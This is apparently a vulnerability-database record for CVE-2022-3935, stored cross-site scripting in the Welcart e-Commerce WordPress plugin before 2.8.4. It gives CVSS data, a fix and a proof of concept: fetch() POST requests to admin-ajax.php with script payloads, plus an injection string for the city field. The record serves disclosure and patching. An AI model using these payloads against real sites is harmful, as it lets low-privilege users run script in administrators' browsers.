The plugin does not sanitise and escape some parameters, which could allow any authenticated user, such as a subscriber, to perform Stored Cross-Site Scripting attacks
{"id": "WPEX-ID:906C5122-DD6D-494B-B66C-4162E234EA05", "vendorId": null, "type": "wpexploit", "bulletinFamily": "exploit", "title": "Welcart e-Commerce < 2.8.4 - Multiple Subscriber+ Stored Cross-Site Scripting", "description": "The plugin does not sanitise and escape some parameters, which could allow any authenticated users, such as subscriber to perform Stored Cross-Site Scripting attacks\n", "published": "2022-11-21T00:00:00", "modified": "2022-11-21T08:06:04", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM"}, "exploitabilityScore": 2.3, "impactScore": 2.7}, "href": "", "reporter": "Lana Codes", "references": [], "cvelist": ["CVE-2022-3935"], "immutableFields": [], "lastseen": "2022-12-15T02:35:31", "viewCount": 38, "enchantments": {"score": {"value": 0.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2022-3935"]}, {"type": "patchstack", "idList": ["PATCHSTACK:1A6ACC83AD4D4274317CCEC58208E2A5"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:906C5122-DD6D-494B-B66C-4162E234EA05"]}]}, "vulnersScore": 0.0}, "_state": {"score": 1671073852, "dependencies": 1671073518}, "_internal": {"score_hash": "65caae4fbcea25f5d5a816534b3b6872"}, "sourceData": "add new payment method with XSS exploit:\r\n\r\nfetch('http://localhost/tester-wp/wp-admin/admin-ajax.php', {\r\n method: 'POST',\r\n headers: new Headers({\r\n 'Content-Type': 'application/x-www-form-urlencoded',\r\n }),\r\n body: 'action=payment_ajax&newname=XSS+Payment&newexplanation=<script>alert(\"XSS\")</script>&newsettlement=acting&newmodule=payment_module'\r\n }).then(response => response.text()).then(result => 
console.log(result)).catch(error => console.log('error', error));\r\n\r\nThe exploit requires at least a subscriber role.\r\n\r\nThe alert script displayed on the 3. Shipping and Payment tab on the shopping cart page.\r\nCart URL: http://localhost/usces-cart/\r\n\r\n---\r\n\r\nadd item option with XSS exploit:\r\n\r\nfetch('http://localhost/tester-wp/wp-admin/admin-ajax.php', {\r\n method: 'POST',\r\n headers: new Headers({\r\n 'Content-Type': 'application/x-www-form-urlencoded',\r\n }),\r\n body: 'action=item_option_ajax&ID=100&update=1&optname=radio_button&optvalue=%3Cscript%3Ealert(%22radio+button+option+XSS%22)%3C%2Fscript%3E&optmeans=1&optessential=1&sort=0&optmetaid=1'\r\n }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));\r\n\r\nIf we want to add it as a common option, the ID will be the Cart page id (#100 cart page id). This post id is public data.\r\n\r\nThen, if the admin selects the option from the list in the \"options for items\" metabox when editing the product, the script will run.\r\n\r\n---\r\n\r\nUser registration is XSS vulnerable.\r\n\r\nAdd a product to the cart, then go to the cart: http://localhost/usces-cart/\r\n\r\nEnter the following code for the city:\r\n\"><script>alert(1)</script>\r\n\r\nThe edit fields are escaped on the admin (for example on user edit page, or order edit page), so the alert script is not displayed. However, if the admin makes changes to the user, the script is added to the log, and the output from the log no longer the escaped, so the alert script runs.\r\n\r\nIn this case, an admin reaction to the XSS exploit is required.", "generation": 0}
{"wpvulndb": [{"lastseen": "2022-12-15T02:35:31", "description": "The plugin does not sanitise and escape some parameters, which could allow any authenticated users, such as subscriber to perform Stored Cross-Site Scripting attacks\n\n### PoC\n\nadd new payment method with XSS exploit: fetch('http://localhost/tester-wp/wp-admin/admin-ajax.php', { method: 'POST', headers: new Headers({ 'Content-Type': 'application/x-www-form-urlencoded', }), body: 'action=payment_ajax&newname=XSS+Payment&newexplanation=&newsettlement=acting&newmodule=payment_module' }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error)); The exploit requires at least a subscriber role. The alert script displayed on the 3. Shipping and Payment tab on the shopping cart page. Cart URL: http://localhost/usces-cart/ \\--- add item option with XSS exploit: fetch('http://localhost/tester-wp/wp-admin/admin-ajax.php', { method: 'POST', headers: new Headers({ 'Content-Type': 'application/x-www-form-urlencoded', }), body: 'action=item_option_ajax&ID=100&update=1&optname=radio_button&optvalue=%3Cscript%3Ealert(%22radio+button+option+XSS%22)%3C%2Fscript%3E&optmeans=1&optessential=1&sort=0&optmetaid=1' }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error)); If we want to add it as a common option, the ID will be the Cart page id (#100 cart page id). This post id is public data. Then, if the admin selects the option from the list in the \"options for items\" metabox when editing the product, the script will run. \\--- User registration is XSS vulnerable. Add a product to the cart, then go to the cart: http://localhost/usces-cart/ Enter the following code for the city: \"> The edit fields are escaped on the admin (for example on user edit page, or order edit page), so the alert script is not displayed. 
However, if the admin makes changes to the user, the script is added to the log, and the output from the log no longer the escaped, so the alert script runs. In this case, an admin reaction to the XSS exploit is required.\n", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 5.4, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2022-11-21T00:00:00", "type": "wpvulndb", "title": "Welcart e-Commerce < 2.8.4 - Multiple Subscriber+ Stored Cross-Site Scripting", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2022-3935"], "modified": "2022-11-21T08:06:04", "id": "WPVDB-ID:906C5122-DD6D-494B-B66C-4162E234EA05", "href": "https://wpscan.com/vulnerability/906c5122-dd6d-494b-b66c-4162e234ea05", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2022-12-14T23:22:57", "description": "The Welcart e-Commerce WordPress plugin before 2.8.4 does not sanitise and escape some parameters, which could allow any authenticated users, such as subscriber to perform Stored Cross-Site Scripting attacks", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 5.4, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2022-12-12T18:15:00", "type": "cve", "title": "CVE-2022-3935", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2022-3935"], "modified": "2022-12-14T21:22:00", "cpe": [], 
"id": "CVE-2022-3935", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-3935", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": []}], "patchstack": [{"lastseen": "2022-11-24T14:39:55", "description": "Multiple Auth. Stored Cross-Site Scripting (XSS) vulnerabilities discovered by Lana Codes in the WordPress Welcart e-Commerce plugin (versions <= 2.8.3).\n\n## Solution\n\n\r\n Update the WordPress Welcart e-Commerce plugin to the latest available version (at least 2.8.4).\r\n ", "cvss3": {}, "published": "2022-11-21T00:00:00", "type": "patchstack", "title": "WordPress Welcart e-Commerce plugin <= 2.8.3 - Multiple Auth. Stored Cross-Site Scripting (XSS) vulnerabilities", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2022-3935"], "modified": "2022-11-21T00:00:00", "id": "PATCHSTACK:1A6ACC83AD4D4274317CCEC58208E2A5", "href": "https://patchstack.com/database/vulnerability/usc-e-shop/wordpress-welcart-e-commerce-plugin-2-8-3-multiple-auth-stored-cross-site-scripting-xss-vulnerabilities", "cvss": {"score": 0.0, "vector": "NONE"}}]}